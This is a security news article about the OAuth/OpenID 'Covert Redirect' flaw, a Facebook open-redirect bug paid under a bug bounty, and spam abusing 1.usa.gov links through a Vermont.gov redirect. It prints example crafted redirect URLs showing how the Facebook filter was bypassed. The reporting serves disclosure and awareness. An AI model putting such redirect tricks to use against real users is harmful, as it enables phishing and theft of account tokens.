The Hacker News — Cyber Security, Hacking, Technology News

After Heartbleed bug, a security flaw in widely used open-source software OpenSSL that puts countless websites at risk, another vulnerability has been found in popular authentication software OpenID and authorization software OAuth.

Wang Jing, a Chinese mathematics Ph.D student at the Nanyang Technological University in Singapore, found that the OAuth and OpenID open source login tools are vulnerable to the "Covert Redirect" exploit.

The login tools ‘OAuth’ and ‘OpenID’ protocols are the commonly used open standard for authorization. OAuth designed as a way for users to sign in or sign up for other services using an existing identity of a site such as Google, Facebook, Microsoft or Twitter, whereas OpenID is a decentralized authentication system for the Internet that allows users to log in at websites across the internet with same digital identity.

The Covert Redirect vulnerability could affect those who use ‘OAuth’ and ‘OpenID’ protocols to ‘login’ to the websites such as Facebook, Google, Yahoo, LinkedIn, Microsoft, VK, Mail.Ru, PayPal, GitHub and many others.

WHAT MAKES IT EVEN MORE DANGEROUS?

The "Covert Redirect" flaw masquerade as a login popup from the affected sites that could allow an attacker to steal personal data from users and redirect them to a website of the attacker's choice, which could potentially further compromise the victim.

By clicking on a malicious phishing link will get a popup window in Facebook, asking them to authorize the app and to hoax the user into giving up their information instead on legitimate websites, the Covert Redirect flaw uses the real site address for authentication.

Once the user login, the attacker could get the personal data, which in the case of Facebook, could include the email address, birth date, contacts, work history, etc.

But, if in case “the token” has greater privilege, the attacker could obtain more sensitive information including the mailbox, friends list, online presence and most possibly even operate and control the user’s account.

In a blog post yesterday Jing explained, for OAuth 2.0, the attacks could risk “the token” of the site users and whenever users authorize the login the attacker could then use that to access users’ private information. In case of OpenID, the attacker could get users’ information directly, as it’s immediately transferred from the provider upon request.

However, this isn't the first time the issue has been raised and the root cause is a lack of token whitelisting in OAuth 2.0.

RESPONSE FROM INTERNET GIANTS

Facebook uses OAuth and something similar to OpenID. When he reported the Facebook about the vulnerability, Facebook said “they understand the risks associated with OAuth 2.0. However, short of forcing every single application on the platform to use a whitelist, [fixing the vulnerability] isn't something that can be accomplished in the short term.”

Facebook isn't the only site affected, Jing reported the vulnerability to some more companies who use both OAuth and OpenID including Google, LinkedIn, Microsoft and Yahoo to discuss the problem.

Google uses OpenID and told Jing, “they are aware of the problem and are tracking it at the moment,” whereas LinkedIn told they have acknowledged the problem back in march and “published a blog post on how [they] intend to address [the problem].”

Microsoft replied after they investigated the matter and concluded that the vulnerability exists in the domain of a third-party which is different from the one Jing reported and recommended him to report the issue to the third-party instead.

Yahoo did not reply months after he reported.

“They have little incentive to fix the problem,” Jing wrote regarding the companies, “One concern is the cost and the other is that in their view, the host company is responsible for making the attacks appear more credible; therefore, it is not solely their problem.”

HOW TO FIX COVERT REDIRECT VULNERABILITY

According to Jing, there is no speedy fix for the vulnerability. “In the real world, a large number of third-party applications do not do this due to various reasons. This makes the systems based on OAuth 2.0 or OpenID highly vulnerable,” Jing wrote.

Wang believes it's unlikely that this flaw will be patched any time soon. He says neither the authentication companies such as Google, Microsoft, Facebook, nor the client companies are taking responsibility for fixing the issue.

However, to take advantage of Covert redirect vulnerability, it requires interaction from users i.e. Victim has to click on a link or visit a malicious website, and then they have to click on a Facebook login button and agree to authorize the login and release of information.

So far, the security experts hasn't labelled this vulnerability as a major security flaw as Heartbleed, but still it’s a threat.

Security Researcher Dan Melameddiscovered an Open URL redirection vulnerability in Facebook that allowed him to have a facebook.com link redirect to any website without restrictions.

An open URL Redirection flaw is generally used to convince a user to click on a trusted link which is specially crafted to take them to an arbitrary website, the target website could be used to serve a malware or for a phishing attack.

An Open URL Redirection url flaw in Facebook platform and third party applications also exposes the user's access token at risk if that link is entered as the final destination in an Oauth dialog.

This URL will always redirects user to the Facebook's homepage, but it is sufficient to manipulate the "url" parameter assigning a random string:

http://facebook.com/campaign/landing.php?url=asdf

In reality the above URL generated a unique "h" variable and passed the url parameter to Facebook's Linkshim (l.php):

http://www.facebook.com/l.php?u=asdf&h=mAQHgtP_E

Once noted the redirection process, Dan Melamed explored the way to exploit the mechanism to bypass the restrictions on redirection and loaded an arbitrary link.

Dan discovered that simply removing the http:// part of the target destination is enough to redirect a Facebook link elsewhere without any restriction i.e.

http://facebook.com/campaign/landing.php?url=yahoo.com

The Facebook's Linkshim (l.php) interprets the link target.com the same as http://target.com making possible the redirection.

Facebook informed Dan that because the redirection occurs through the l.php method, the social networking platform is able to apply a proper filter from redirecting using automatic spam and malware analysis.

It is easy to understand that despite Facebook filters target url, it could not detect all malware/spam campaign addressed "and by the time a link is banned, an attacker would have already moved on to another link."

Proof of Concept video:

Facebook quickly fixed the vulnerability after the Dan's report and the payout $1,000 reward under the bug bounty program.

In Past he had revealed a Critical Facebook vulnerability that allowed account hacking and two Facebook vulnerabilities related to the Fanpage Invite of the popular social network.

Symantec has reported an increase in spam messages containing .gov URLs. Cybercriminals are using 1.usa.gov links in their spam campaigns to trick users into thinking the links lead to genuine US government Web sites.

Spammers have created these shortened URLs through a loophole in the URL shortening service provided by bit.ly. USA.gov and bit.ly have collaborated, enabling anyone to shorten a .gov or .mil URL into a trustworthy 1.usa.gov URL.

The click rate of the campaign has been significant, redirecting more than 16,000 victims over a five day period to a malicious website designed to look like a CNBC news article pushing several work from home scams.

According to researchers from security firm Symantec, they simply leveraged an open-redirect vulnerability present on the official government site of Vermont (Vermont.gov) . Therefore, something like 1.usa.gov/…/Rxpfn9 takes you to labor.vermont.gov/LinkClick.aspx?link=[spam site] which then redirects you to the spam site in question.

Email spam has been the primary method for distributing the short links, wrote Jeff Jarmoc of Dell SecureWorks' Counter Threat Unit.

Most of the victims are in United States (61%), Canada (23%), Australia, and Great Britain. While taking advantage of URL shorteners or an open-redirect vulnerability is not a new tactic, the fact that spammers can utilize a .gov service to make their own links is worrisome. We encourages users to always follow best practices and exercise caution when opening links even if it is a .gov URL.